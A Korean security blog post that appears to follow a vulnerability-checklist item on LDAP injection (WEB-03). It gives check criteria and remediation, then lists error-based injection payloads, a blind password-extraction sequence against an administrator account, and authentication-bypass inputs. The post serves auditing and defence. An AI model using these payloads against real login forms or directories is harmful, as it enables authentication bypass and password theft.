์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

์ฃผ์š”์ •๋ณดํ†ต์‹ ๊ธฐ๋ฐ˜์‹œ์„ค WEB-03 LDAP ์ธ์ ์…˜

  • -
๋ฐ˜์‘ํ˜•
WEB-03 LDAP ์ธ์ ์…˜

์‚ฌ์šฉ์ž ์ž…๋ ฅ์„ ๊ธฐ๋ฐ˜์œผ๋กœ LDAP ๊ตฌ๋ฌธ์„ ๊ตฌ์ถ•ํ•˜์—ฌ ์›น ๊ธฐ๋ฐ˜ ์‘์šฉํ”„๋กœ๊ทธ๋žจ์„ ์•…์šฉํ•˜๋Š”๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ณต๊ฒฉ

 

์ ๊ฒ€ ๋ฐ ํŒ๋‹จ ๊ธฐ์ค€

- ์–‘ํ˜ธ : ์ž„์˜์˜ LDAP ์ฟผ๋ฆฌ ์ž…๋ ฅ์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ์ด๋ฃจ์–ด์ ธ ๋ณ€์กฐ๋œ ์ฟผ๋ฆฌ๊ฐ€ ์‹คํ–‰๋˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ

- ์ทจ์•ฝ : ์ž„์˜์˜ LDAP ์ฟผ๋ฆฌ ์ž…๋ ฅ์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ์ด๋ฃจ์–ด์ง€์ง€ ์•Š์•„ ๋ณ€์กฐ๋œ ์ฟผ๋ฆฌ๊ฐ€ ์‹คํ–‰๋˜๋Š” ๊ฒฝ์šฐ

 

์กฐ์น˜ ๋ฐฉ๋ฒ•

- ์ง€์ •๋œ ๋ฌธ์ž์—ด๋งŒ ์ž…๋ ฅ ํ—ˆ์šฉํ•˜๊ณ , ์ž„์˜์˜ LDAP์ฟผ๋ฆฌ ์ž…๋ ฅ์— ๋Œ€ํ•œ ๊ฒ€์ฆ ๋กœ์ง ๊ตฌํ˜„

 

์ ๊ฒ€ ๋ฐฉ๋ฒ•

- ์›น ์‚ฌ์ดํŠธ์˜ ์‚ฌ์šฉ์ž ์ธ์ˆ˜ ๊ฐ’์„ ์ž…๋ ฅ ๋ฐ›๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜( ๋กœ๊ทธ์ธ ํผ , URL ๋“ฑ )์— ๋ณ€์กฐ ๋œ LDAP ์ฟผ๋ฆฌ ์ „์†ก ํ›„ ์‹คํ–‰๋˜๋Š”์ง€ ํ™•์ธ

 

๋ณด์•ˆ ์„ค์ • ๋ฐฉ๋ฒ•

- ์‚ฌ์šฉ์ž ์ž…๋ ฅ ๋ฐ›์„ White List๋กœ ์ง€์ •ํ•˜์—ฌ ์˜๋ฌธ๊ณผ ์ˆซ์ž๋งŒ์„ ํ—ˆ์šฉ

- DN๊ณผ ํ•„ํ„ฐ์— ์‚ฌ์šฉ๋˜๋Š” ์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’์—๋Š” ํŠน์ˆ˜๋ฌธ์ž๊ฐ€ ํฌํ•จ๋˜์ง€ ์•Š๋„๋ก ํŠน์ˆ˜๋ฌธ์ž ์ œ๊ฑฐ

- ํŠน์ˆ˜๋ฌธ์ž๋ฅผ ์‚ฌ์šฉํ•ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•ด์„œ๋Š” ์‹คํ–‰ ๋ช…๋ น์ด ์•„๋‹Œ ์ผ๋ฐ˜ ๋ฌธ์ž๋กœ ์ธ์‹ ๋˜๋„๋ก ์ฒ˜๋ฆฌ

 

Error base

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Blind

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
(&(sn=administrator)(password=MY*))  : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK

 

Exploitation

user  = *)(uid=*))(|(uid=*
pass  = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
user  = admin)(!(&(1=0
pass  = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))

 

Attribute List

userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

 

๋ฐ˜์‘ํ˜•
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.